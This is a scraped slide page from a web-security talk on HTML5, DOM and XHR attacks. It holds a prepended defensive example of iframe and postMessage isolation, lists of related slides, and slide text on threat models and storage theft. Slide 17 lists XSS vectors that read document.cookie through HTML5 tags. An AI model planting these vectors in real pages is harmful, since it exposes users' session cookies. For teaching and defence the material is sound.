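The isolation the slide asks for, as an added example (not code from the slides): each widget runs in its own iframe on its own origin and reaches the host page only through postMessage; the host accepts a message only from a registered widget origin, only of a type that widget may send, and treats the payload as data. The host side is driven with constructed events so it runs in Node; origins, paths and message types are assumptions.

```javascript
// Added example, not from the slides: widget isolation with sandboxed iframes and an
// origin-checked postMessage channel. Origins, paths and message types are assumptions.

// Host-side registry: which origin may send which message types.
const WIDGETS = {
  'https://mail-widget.example.com': { path: '/mail.html', allowedTypes: new Set(['unread-count']) },
  'https://rss-widget.example.com':  { path: '/rss.html',  allowedTypes: new Set(['feed-updated']) },
};
const HOST_ORIGIN = 'https://portal.example.com';

// Markup the host emits for a widget. allow-same-origin keeps the frame's real
// origin, which the origin check below depends on; that is safe only because every
// widget origin differs from the host's. Never pair it with allow-scripts for a frame
// served from the host's own origin: such a frame could remove its own sandbox.
function widgetFrameMarkup(origin) {
  const w = WIDGETS[origin];
  if (!w) throw new Error('unregistered widget origin');
  return '<iframe src="' + origin + w.path + '" sandbox="allow-scripts allow-same-origin"></iframe>';
}

// Host side: window.addEventListener('message', (e) => apply(handleWidgetMessage(e))).
function handleWidgetMessage(event) {
  const widget = WIDGETS[event.origin];               // "null" and unknown origins fail here
  if (!widget) return { accepted: false, reason: 'unknown origin ' + event.origin };
  const msg = event.data;
  if (!msg || typeof msg !== 'object' || typeof msg.type !== 'string') {
    return { accepted: false, reason: 'malformed message' };
  }
  if (!widget.allowedTypes.has(msg.type)) {
    return { accepted: false, reason: 'type ' + msg.type + ' not allowed for ' + event.origin };
  }
  // Payload is data: the caller renders it with textContent, never innerHTML or eval.
  return { accepted: true, origin: event.origin, type: msg.type, value: String(msg.value) };
}

// Widget side: always name the target origin; "*" would let any page that framed
// the widget read the message.
function sendToHost(parentWindow, msg) {
  parentWindow.postMessage({ type: msg.type, value: msg.value }, HOST_ORIGIN);
}
```

With this in place the attacker's widget from the "Cross DOM Access" slide has no DOM to trap: it cannot reach the host or sibling frames, and the only thing it can send the host is a message the host will refuse on origin or type.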
Demo

 Cross Widget Spying
 Using DOMScan to review Widget Architecture
 and Access Mechanism
 RSS Feed Hacking
 Mashup Hacks
 Cross Domain Callback Hacking




DEFENDING APPLICATIONS


Security at CODE Level
  JS, Flash or XAP should not carry server side
  logic; they should be the presentation layer only …
  Obfuscation may help a bit, but it is not foolproof.
  Source code and object code analysis is required during
  blackbox testing
  Resource discovery and fuzzing: a must for
  SOAP, JSON and AMF streams
  Careful with HTML 5 implementation
  DOM based scanning and analysis is required
  Cross streams and third party analytics
CONCLUSION AND
QUESTIONS

http://shreeraj.blogspot.com
shreeraj@blueinfy.com
http://www.blueinfy.com

Web Attacks - Top threats - 2010
 
JavaScript DOM Manipulations
JavaScript DOM ManipulationsJavaScript DOM Manipulations
JavaScript DOM Manipulations
 
Introduction to the DOM
Introduction to the DOMIntroduction to the DOM
Introduction to the DOM
 
Angular 2 interview questions and answers
Angular 2 interview questions and answersAngular 2 interview questions and answers
Angular 2 interview questions and answers
 
Advanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JSAdvanced Tips & Tricks for using Angular JS
Advanced Tips & Tricks for using Angular JS
 
AngularJS performance & production tips
AngularJS performance & production tipsAngularJS performance & production tips
AngularJS performance & production tips
 
DOM Features You Didn’t Know Existed
DOM Features You Didn’t Know ExistedDOM Features You Didn’t Know Existed
DOM Features You Didn’t Know Existed
 
Advanced AngularJS Concepts
Advanced AngularJS ConceptsAdvanced AngularJS Concepts
Advanced AngularJS Concepts
 

Similar to Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)

HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsShreeraj Shah
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYShreeraj Shah
 
Find me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery!   shreeraj shahFind me if you can – smart fuzzing and discovery!   shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shahowaspindia
 
Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007ClubHack
 
Cross platform mobile web apps
Cross platform mobile web appsCross platform mobile web apps
Cross platform mobile web appsJames Pearce
 
Building Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsBuilding Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsJames Pearce
 
HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1James Pearce
 
An Intro to Mobile HTML5
An Intro to Mobile HTML5An Intro to Mobile HTML5
An Intro to Mobile HTML5James Pearce
 
A Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionA Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionJames Pearce
 
Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2guest66dc5f
 
Building cross platform mobile web apps
Building cross platform mobile web appsBuilding cross platform mobile web apps
Building cross platform mobile web appsJames Pearce
 
Mike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns FrameworksMike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns Frameworksukdpe
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT ProfileHelen
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT ProfileHelen
 
Poly Source It Profile
Poly Source It ProfilePoly Source It Profile
Poly Source It Profilemoseskhedi
 
Polysource It Profile
Polysource It ProfilePolysource It Profile
Polysource It Profileelenarys
 
Building Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web AppsBuilding Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web AppsJames Pearce
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseShreeraj Shah
 
HTML5 and the dawn of rich mobile web applications
HTML5 and the dawn of rich mobile web applicationsHTML5 and the dawn of rich mobile web applications
HTML5 and the dawn of rich mobile web applicationsJames Pearce
 

Similar to Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2) (20)

HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
 
Find me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery!   shreeraj shahFind me if you can – smart fuzzing and discovery!   shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shah
 
Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007
 
Cross platform mobile web apps
Cross platform mobile web appsCross platform mobile web apps
Cross platform mobile web apps
 
Building Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsBuilding Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web Apps
 
HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1
 
An Intro to Mobile HTML5
An Intro to Mobile HTML5An Intro to Mobile HTML5
An Intro to Mobile HTML5
 
A Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionA Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 Revolution
 
Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2Shreeraj-Hacking_Web_2
Shreeraj-Hacking_Web_2
 
Building cross platform mobile web apps
Building cross platform mobile web appsBuilding cross platform mobile web apps
Building cross platform mobile web apps
 
Mike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns FrameworksMike Taulty MIX10 Silverlight 4 Patterns Frameworks
Mike Taulty MIX10 Silverlight 4 Patterns Frameworks
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT Profile
 
Polysource-IT Profile
Polysource-IT ProfilePolysource-IT Profile
Polysource-IT Profile
 
Poly Source It Profile
Poly Source It ProfilePoly Source It Profile
Poly Source It Profile
 
Polysource It Profile
Polysource It ProfilePolysource It Profile
Polysource It Profile
 
Building Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web AppsBuilding Cross Platform Mobile Web Apps
Building Cross Platform Mobile Web Apps
 
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
Building rich Single Page Applications (SPAs) for desktop, mobile, and tablet...
 
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the RiseHacking Ajax & Web Services - Next Generation Web Attacks on the Rise
Hacking Ajax & Web Services - Next Generation Web Attacks on the Rise
 
HTML5 and the dawn of rich mobile web applications
HTML5 and the dawn of rich mobile web applicationsHTML5 and the dawn of rich mobile web applications
HTML5 and the dawn of rich mobile web applications
 

More from Shreeraj Shah

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectorsShreeraj Shah
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperShreeraj Shah
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoShreeraj Shah
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software Shreeraj Shah
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web Shreeraj Shah
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...Shreeraj Shah
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesShreeraj Shah
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingShreeraj Shah
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Shreeraj Shah
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Shreeraj Shah
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Shreeraj Shah
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Shreeraj Shah
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Shreeraj Shah
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Shreeraj Shah
 

More from Shreeraj Shah (15)

Html5 localstorage attack vectors
Html5 localstorage attack vectorsHtml5 localstorage attack vectors
Html5 localstorage attack vectors
 
Top 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - WhitepaperTop 10 HTML5 Threats - Whitepaper
Top 10 HTML5 Threats - Whitepaper
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
Dom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat PresoDom Hackking & Security - BlackHat Preso
Dom Hackking & Security - BlackHat Preso
 
Secure SDLC for Software
Secure SDLC for Software Secure SDLC for Software
Secure SDLC for Software
 
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web [Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
[Infosecworld 08 Orlando] CSRF: The Biggest Little Vulnerability on the Web
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
 
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web ServicesWeb 2.0 Application Kung-Fu - Securing Ajax & Web Services
Web 2.0 Application Kung-Fu - Securing Ajax & Web Services
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
 
Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)Hacking and Securing .NET Apps (Infosecworld)
Hacking and Securing .NET Apps (Infosecworld)
 
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)Web Application Kung-Fu, Art of Defense (Bellua/HITB)
Web Application Kung-Fu, Art of Defense (Bellua/HITB)
 
Web Services Security Chess (RSA)
Web Services Security Chess (RSA)Web Services Security Chess (RSA)
Web Services Security Chess (RSA)
 
Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)Advanced Web Hacking (EUSecWest 06)
Advanced Web Hacking (EUSecWest 06)
 
Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)Advanced Web Services Hacking (AusCERT 06)
Advanced Web Services Hacking (AusCERT 06)
 

Recently uploaded

Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 

Recently uploaded (20)

Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 

Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)

  • 5. Real Life Cases
       Last three years – several applications reviewed (Banking, Trading, Portals, Web 2.0 sites etc…)
       Interesting outcomes and stats
       Auto scanning is becoming increasingly difficult and impossible in some cases
       Sites are vulnerable and easily exploitable in many cases
  • 6. Technology Shift & Trend
       [Diagram: client-side components in the browser and server-side components, with the layers Presentation, Business, Data Access, Authentication and Communication sitting on Runtime, Platform and Operating System components. Technology labels: Mobile (Android, iPhone/Pad), HTML 5 (Storage, WebSocket, WebSQL, DOM, JS, XHR), Flash/Flex (AMF), Silverlight (XAML, WCF, .NET), Other.]
  • 7. Browser Model
       [Diagram of the browser stack, layer by layer: Presentation (Mobile, HTML5, Silverlight, Flash Plug-In); Process & Logic (JavaScript, DOM/Events, Parser/Threads, WebSQL, Storage); Network & Access (XHR, WebSocket, Plug-in Sockets, Browser Native Network Services); Core Policies (Same Origin Policy (SOP), Sandbox).]
  • 8. Layers
       Presentation – HTML5, Silverlight, Flash/Flex
       Process & Logic – JavaScript, Document Object Model (DOM - 3), Events, Parsers/Threads etc.
       Network & Access – XHR – Level 2, WebSockets, Plugin-Sockets
       Core Policies – SOP, Sandboxing for iframe, Shared Resources
  • 9. Application Architecture
       [Diagram: the end-client browser stack (HTML / JS / DOM, Ajax, RIA (Flash)) reaches Trading, Weather, Email, Banking and Blog services over the Internet; on the server side sit the Web Server, Web Services, Application Server, Data-access layer, Database and an Authentication Server for Auth./Access.]
  • 10. Attack Surface Expansion
       [Diagram of entry points into the client stack (HTML / JS / DOM, Ajax, RIA (Flash)): HTTP variables – POST name and value pairs, QueryString, Cookie etc.; HTTP response variables; JSON/XML streams; DOM calls/events; file attachments, uploads etc.; API streams; Open APIs and Feeds and other integrated streams; third-party information.]
  • 11. AppSec dynamics
       [Figure – Source: OWASP]
  • 12. Integration and Communications
       DOM glues everything – it integrates Flex, Silverlight and HTML if needed
       Various ways to communicate – native browser way, using XHR and WebSockets
       Options for data sharing – JSON, XML, WCF, AMF etc. (many more)
       Browsers are supporting a new set of technologies, and that expands the exposed surface
  • 13. Demos
       App using DOM, AJAX and Web Services
       HTML 5 components and usage
       Fingerprinting Application Assets from DOM or JavaScripts
       Frameworks, Scripts, Structures, and so on – DWR/Struts
  • 14. Threat Model
       [Diagram mapping the numbered threats onto the browser layers – Presentation (Events, Tags & Attributes, Thick Features), Process & Logic (WebSQL, DOM, Storage, Parser/Threads), Network & Access (XHR, WebSocket, Plug-in Sockets, Browser Native Network Services), Core Policies (Same Origin Policy (SOP), Sandbox).]
       1. XSS abuse with tags and attributes
       2. DOM based XSS and redirects
       3. Stealing from the storage
       4. Injecting and exploiting WebSQL
       5. Abusing network API and sockets
       6. CSRF across streams
       7. Sandbox attacks
       8. Abusing new features like drag-and-drop and ClickJacking
       9. Threats to widgets and mashups
       10. Botnet/Spynet using WebWorkers
  • 15. Mapping top 10 – Current Context
       A1 – Injection: JSON, AMF, WCF, XML Injection along with WebSQL.
       A2 – XSS: DOM based XSS, Script injection through , Direct third party streams, HTML5 tags
       A3 – Broken Authentication and Session Management: Reverse Engineering Authentication/Authorization logic (JS, Flash or Silverlight) & LocalStorage
       A4 – Insecure Direct Object Referencing: Insecure Data Access Level calls from browser.
       A5 – CSRF: CSRF with XML, JSON and AMF streams and XHR (SOP and Sharing)
       A6 – Security Misconfiguration: Insecure browsers, poor policies, trust model
       A7 – Failure to restrict URL Access: Hidden URL and resource-fetching from reverse engineering
       A8 – Unvalidated Redirects: DOM-based redirects and spoofing
       A9 – Insecure Crypto Storage: Local storage inside browser and Global variables
       A10 – Insufficient Transport Layer Protection: Ajax and other calls going over non-SSL channels.
       Mobile 10 …
  • 16. HTML 5 – TAGS, STORAGE & WEBSQL
  • 17. Abusing HTML 5 Tags
       Various new tags can be abused and may not be filtered or validated
       Media tags
         <video poster=javascript:alert(document.cookie)//
         <audio><source onerror="javascript:alert(document.cookie)">
       Form tags
         <form><button formaction="javascript:alert(document.cookie)">foo
         <body oninput=alert(document.cookie)><input autofocus>
  • 18. Attacking Storage
       HTML 5 provides local storage, which can hold globally scoped variables
       http://www.w3.org/TR/webstorage/
  • 19. Attacking Storage
       It is possible to steal them through XSS or via JavaScript getItem and setItem calls
       XSS the box and scan through storage
  • 20. DOM Storage
       Applications run with a “rich” DOM
       JavaScript sets several variables and parameters while loading – GLOBALS
       They hold sensitive information – what if they are GLOBAL and remain for the life of the application?
       They can be retrieved with XSS
       HTTP requests and responses are going through JavaScript (XHR) – what about those vars?
  • 21. What is wrong?
  • 22. By default it's Global
       Here is the line of code:
         temp = "login.do?user="+user+"&pwd="+pwd;   // no var: temp becomes a window-level global holding the credentials
         xmlhttp.open("GET",temp,true);
         xmlhttp.onreadystatechange=function()
  • 23. DOM stealing
       It is possible to get these variables and clear text information – user/pass
       Responses and tokens
       Business information
       XHR calls and HTTP request/responses
       Dummy XHR object injection
       Lot of possibilities for exploitation
